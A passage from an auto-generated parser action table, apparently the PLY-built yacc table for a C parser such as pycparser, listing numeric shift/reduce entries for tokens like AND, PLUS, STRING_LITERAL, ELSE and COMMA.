93,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,187,187,-309,187,-309,-28,187,-167,-308,187,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,187,187,187,187,187,187,187,187,-266,-267,-268,-265,-269,-270,-309,187,-309,-28,-266,187,187,187,187,187,-202,-201,187,187,187,-218,187,187,187,187,187,-80,187,-214,-215,-217,187,-224,-225,-226,-227,-228,-229,-230,-231,-232,-23
3,-234,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,-11,187,-12,187,-266,187,187,-309,-266,187,187,-203,187,-205,187,-79,187,-213,-216,-309,-182,187,-309,-28,-266,-204,187,187,-309,187,187,187,187,187,187,187,-11,-266,187,187,-206,-80,-208,-209,187,187,-309,187,187,-207,-210,187,187,-212,-211,]),'AND':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,191,191,-309,191,-309,-28,-294,191,-167,-308,191,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,191,191,191,191,-257,316,-259,191,191,191,-238,191,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,191,-309,-28,-266,191,191,191,191,191,-202,-201,191,-257,191,191,-218,191,191,191,191,191,-80,191,-214,-215,-217,191,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,-279,-280,-260,191,-261,-262,-263,191,-304,-306,-11,191,-12,191,-266,191,191,-309,-266,191,191,-203,191,-205,191,-287,-79,191,-213,-216,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-2
52,316,316,316,316,-274,-275,-276,-277,-278,-309,-182,191,-309,-28,-266,-204,191,191,-309,-258,191,191,191,191,191,-272,-273,191,-264,191,-11,-266,191,191,-206,-80,-208,-209,191,191,-281,-309,191,-288,191,-207,-282,-210,191,191,-212,-211,]),'PLUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,189,189,-309,189,-309,-28,-294,189,-167,-308,189,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,189,189,189,189,-257,306,-259,189,189,189,-238,189,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,189,-309,-28,-266,189,189,189,189,189,-202,-201,189,-257,189,189,-218,189,189,189,189,189,-80,189,-214,-215,-217,189,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,-279,-280,-260,189,-261,-262,-263,189,-304,-306,-11,189,-12,189,-266,189,189,-309,-266,189,189,-203,189,-205,189,-287,-79,189,-213,-216,-239,-240,-241,-242,-243,306,306,306,306,306,306,306,306,306,306,306,306,306,-274,-275,-276,-277,-278,-309,-182,189,-309,-28,-266,-204,189,189,-309,-258,189,189,189,189,
189,-272,-273,189,-264,189,-11,-266,189,189,-206,-80,-208,-209,189,189,-281,-309,189,-288,189,-207,-282,-210,189,189,-212,-211,]),'MINUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,190,190,-309,190,-309,-28,-294,190,-167,-308,190,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,190,190,190,190,-257,307,-259,190,190,190,-238,190,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,190,-309,-28,-266,190,190,190,190,190,-202,-201,190,-257,190,190,-218,190,190,190,190,190,-80,190,-214,-215,-217,190,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,-279,-280,-260,190,-261,-262,-263,190,-304,-306,-11,190,-12,190,-266,190,190,-309,-266,190,190,-203,190,-205,190,-287,-79,190,-213,-216,-239,-240,-241,-242,-243,307,307,307,307,307,307,307,307,307,307,307,307,307,-274,-275,-276,-277,-278,-309,-182,190,-309,-28,-266,-204,190,190,-309,-258,190,190,190,190,190,-272,-273,190,-264,190,-11,-266,190,190,-206,-80,-208,-209,190,190,-281,-309,190,-288,190,-207,-282,-210,1
90,190,-212,-211,]),'NOT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,193,193,-309,193,-309,-28,193,-167,-308,193,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,193,193,193,193,193,193,193,193,-266,-267,-268,-265,-269,-270,-309,193,-309,-28,-266,193,193,193,193,193,-202,-201,193,193,193,-218,193,193,193,193,193,-80,193,-214,-215,-217,193,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,-11,193,-12,193,-266,193,193,-309,-266,193,193,-203,193,-205,193,-79,193,-213,-216,-309,-182,193,-309,-28,-266,-204,193,193,-309,193,193,193,193,193,193,193,-11,-266,193,193,-206,-80,-208,-209,193,193,-309,193,193,-207,-210,193,193,-212,-211,]),'LNOT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,
522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,194,194,-309,194,-309,-28,194,-167,-308,194,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,194,194,194,194,194,194,194,194,-266,-267,-268,-265,-269,-270,-309,194,-309,-28,-266,194,194,194,194,194,-202,-201,194,194,194,-218,194,194,194,194,194,-80,194,-214,-215,-217,194,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,-11,194,-12,194,-266,194,194,-309,-266,194,194,-203,194,-205,194,-79,194,-213,-216,-309,-182,194,-309,-28,-266,-204,194,194,-309,194,194,194,194,194,194,194,-11,-266,194,194,-206,-80,-208,-209,194,194,-309,194,194,-207,-210,194,194,-212,-211,]),'OFFSETOF':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,199,199,-309,199,-309,-28,199,-167,-308,199,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,199,199,199,199,199,199,199,199,-266,-267,-268,-265,-269,-270,-309,199,-309,-28,-266,199,199,199,199,199,-202,-201,199,199,199,-218,199,199,199,199,199,-80,199,-214,-215,-217,199,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,-11,199,-12,199,-266,199,199,-309,-266,199,199,-203,199,-205,199,-79,199,-213,-216,-309,-182,199,-309,-28,-266,-204,199,199,-309,199,199,199,199,199,199,199,-11
,-266,199,199,-206,-80,-208,-209,199,199,-309,199,199,-207,-210,199,199,-212,-211,]),'INT_CONST_DEC':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,200,200,-309,200,-309,-28,200,-167,-308,200,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,200,200,200,200,200,200,200,200,-266,-267,-268,-265,-269,-270,-309,200,-309,-28,-266,200,200,200,200,200,-202,-201,200,200,200,-218,200,200,200,200,200,-80,200,-214,-215,-217,200,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,-11,200,-12,200,-266,200,200,-309,-266,200,200,-203,200,-205,200,-79,200,-213,-216,-309,-182,200,-309,-28,-266,-204,200,200,-309,200,200,200,200,200,200,200,-11,-266,200,200,-206,-80,-208,-209,200,200,-309,200,200,-207,-210,200,200,-212,-211,]),'INT_CONST_OCT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,
464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,201,201,-309,201,-309,-28,201,-167,-308,201,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,201,201,201,201,201,201,201,201,-266,-267,-268,-265,-269,-270,-309,201,-309,-28,-266,201,201,201,201,201,-202,-201,201,201,201,-218,201,201,201,201,201,-80,201,-214,-215,-217,201,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,-11,201,-12,201,-266,201,201,-309,-266,201,201,-203,201,-205,201,-79,201,-213,-216,-309,-182,201,-309,-28,-266,-204,201,201,-309,201,201,201,201,201,201,201,-11,-266,201,201,-206,-80,-208,-209,201,201,-309,201,201,-207,-210,201,201,-212,-211,]),'INT_CONST_HEX':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,202,202,-309,202,-309,-28,202,-167,-308,202,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,202,202,202,202,202,202,202,202,-266,-267,-268,-265,-269,-270,-309,202,-309,-28,-266,202,202,202,202,202,-202,-201,202,202,202,-218,202,202,202,202,202,-80,202,-214,-215,-217,202,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,-11,202,-12,202,-266,202,202,-309,-266,202,202,-203,202,-205,202,-79,20
2,-213,-216,-309,-182,202,-309,-28,-266,-204,202,202,-309,202,202,202,202,202,202,202,-11,-266,202,202,-206,-80,-208,-209,202,202,-309,202,202,-207,-210,202,202,-212,-211,]),'INT_CONST_BIN':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,203,203,-309,203,-309,-28,203,-167,-308,203,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,203,203,203,203,203,203,203,203,-266,-267,-268,-265,-269,-270,-309,203,-309,-28,-266,203,203,203,203,203,-202,-201,203,203,203,-218,203,203,203,203,203,-80,203,-214,-215,-217,203,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,-11,203,-12,203,-266,203,203,-309,-266,203,203,-203,203,-205,203,-79,203,-213,-216,-309,-182,203,-309,-28,-266,-204,203,203,-309,203,203,203,203,203,203,203,-11,-266,203,203,-206,-80,-208,-209,203,203,-309,203,203,-207,-210,203,203,-212,-211,]),'FLOAT_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,3
68,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,204,204,-309,204,-309,-28,204,-167,-308,204,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,204,204,204,204,204,204,204,204,-266,-267,-268,-265,-269,-270,-309,204,-309,-28,-266,204,204,204,204,204,-202,-201,204,204,204,-218,204,204,204,204,204,-80,204,-214,-215,-217,204,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,-11,204,-12,204,-266,204,204,-309,-266,204,204,-203,204,-205,204,-79,204,-213,-216,-309,-182,204,-309,-28,-266,-204,204,204,-309,204,204,204,204,204,204,204,-11,-266,204,204,-206,-80,-208,-209,204,204,-309,204,204,-207,-210,204,204,-212,-211,]),'HEX_FLOAT_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,205,205,-309,205,-309,-28,205,-167,-308,205,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,205,205,205,205,205,205,205,205,-266,-267,-268,-265,-269,-270,-309,205,-309,-28,-266,205,205,205,205,205,-202,-201,205,205,205,-218,205,205,205,205,205,-80,205,-214,-215,-217,205,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,20
5,205,205,205,205,-11,205,-12,205,-266,205,205,-309,-266,205,205,-203,205,-205,205,-79,205,-213,-216,-309,-182,205,-309,-28,-266,-204,205,205,-309,205,205,205,205,205,205,205,-11,-266,205,205,-206,-80,-208,-209,205,205,-309,205,205,-207,-210,205,205,-212,-211,]),'CHAR_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,206,206,-309,206,-309,-28,206,-167,-308,206,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,206,206,206,206,206,206,206,206,-266,-267,-268,-265,-269,-270,-309,206,-309,-28,-266,206,206,206,206,206,-202,-201,206,206,206,-218,206,206,206,206,206,-80,206,-214,-215,-217,206,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,-11,206,-12,206,-266,206,206,-309,-266,206,206,-203,206,-205,206,-79,206,-213,-216,-309,-182,206,-309,-28,-266,-204,206,206,-309,206,206,206,206,206,206,206,-11,-266,206,206,-206,-80,-208,-209,206,206,-309,206,206,-207,-210,206,206,-212,-211,]),'WCHAR_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311
,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,207,207,-309,207,-309,-28,207,-167,-308,207,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,207,207,207,207,207,207,207,207,-266,-267,-268,-265,-269,-270,-309,207,-309,-28,-266,207,207,207,207,207,-202,-201,207,207,207,-218,207,207,207,207,207,-80,207,-214,-215,-217,207,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,-11,207,-12,207,-266,207,207,-309,-266,207,207,-203,207,-205,207,-79,207,-213,-216,-309,-182,207,-309,-28,-266,-204,207,207,-309,207,207,207,207,207,207,207,-11,-266,207,207,-206,-80,-208,-209,207,207,-309,207,207,-207,-210,207,207,-212,-211,]),'STRING_LITERAL':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,197,208,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,333,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,208,208,-309,208,-309,-28,208,-167,-308,208,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,208,208,208,208,208,208,208,208,-266,-267,-268,-265,-269,-270,333,-303,-309,208,-309,-28,-266,208,208,208,208,208,-202,-201,208,208,208,-218,208,208,208,208,208,-80,208,-214,-215,-217,208,-224,-225,-226,-227,-22
8,-229,-230,-231,-232,-233,-234,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,-304,-11,208,-12,208,-266,208,208,-309,-266,208,208,-203,208,-205,208,-79,208,-213,-216,-309,-182,208,-309,-28,-266,-204,208,208,-309,208,208,208,208,208,208,208,-11,-266,208,208,-206,-80,-208,-209,208,208,-309,208,208,-207,-210,208,208,-212,-211,]),'WSTRING_LITERAL':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,198,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,209,209,-309,209,-309,-28,209,-167,-308,209,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,209,209,209,209,209,209,209,209,-266,-267,-268,-265,-269,-270,334,-305,-309,209,-309,-28,-266,209,209,209,209,209,-202,-201,209,209,209,-218,209,209,209,209,209,-80,209,-214,-215,-217,209,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,-306,-11,209,-12,209,-266,209,209,-309,-266,209,209,-203,209,-205,209,-79,209,-213,-216,-309,-182,209,-309,-28,-266,-204,209,209,-309,209,209,209,209,209,209,209,-11,-266,209,209,-206,-80,-208,-209,209,209,-309,209,209,-207,-210,209,209,-212,-211,]),'ELSE':([14,78,144,156,157,158,159,160,161,162,264,273,282,283,286,287,289,381,384,395,398,399,458,490,491,493,494,518,520,526,528,],[-68,-69,-308,-72,-73,-74,-75,-76,-77,-78,-202,-218,-78,-80,-214,-215,-217,-203,-205,-79,-213,-216,-20
4,-206,507,-208,-209,-207,-210,-212,-211,]),'PPPRAGMASTR':([14,],[78,]),'EQUALS':([15,23,62,73,74,75,76,81,92,108,110,127,131,138,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,227,228,270,325,326,327,329,330,331,333,334,341,342,349,350,351,352,387,422,424,425,426,427,435,437,438,439,442,443,462,469,470,473,478,479,480,508,513,519,],[-52,-29,-162,113,-163,-54,-37,-53,130,-162,-55,-294,-30,248,-308,-294,291,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,-35,-36,-257,-279,-280,-260,-261,-262,-263,-304,-306,434,-183,-43,-44,-31,-34,-287,-274,-275,-276,-277,-278,-184,-186,-39,-42,-32,-33,-258,-272,-273,-264,-185,-40,-41,-281,-288,-282,]),'COMMA':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,62,63,64,65,66,70,72,73,74,75,76,81,87,90,91,92,94,95,96,97,98,99,102,103,108,110,121,123,124,125,126,127,131,132,133,136,137,138,142,144,148,163,169,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,211,212,213,214,227,228,231,232,233,234,235,236,237,240,241,242,243,244,245,246,247,250,252,253,256,257,259,260,261,263,269,270,276,277,288,325,326,327,329,330,331,333,334,337,349,350,351,352,356,357,358,359,371,372,373,374,375,376,380,385,387,388,389,391,392,393,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,430,431,433,438,439,442,443,449,450,451,452,456,457,462,469,470,473,475,479,480,485,486,487,488,489,492,495,498,499,502,503,504,508,513,516,517,519,524,],[-52,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-162,-89,-90,-91,-92,111,-120,-122,-163,-54,-37,-53,-94,129,-124,-126,-164,-27,-28,-166,-152,-153,-132,-133,-162,-55,229,230,-170,-175,-309,-294,-30,-165,-167,247,-157,-160,-135,-308,-130,-294,278,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300
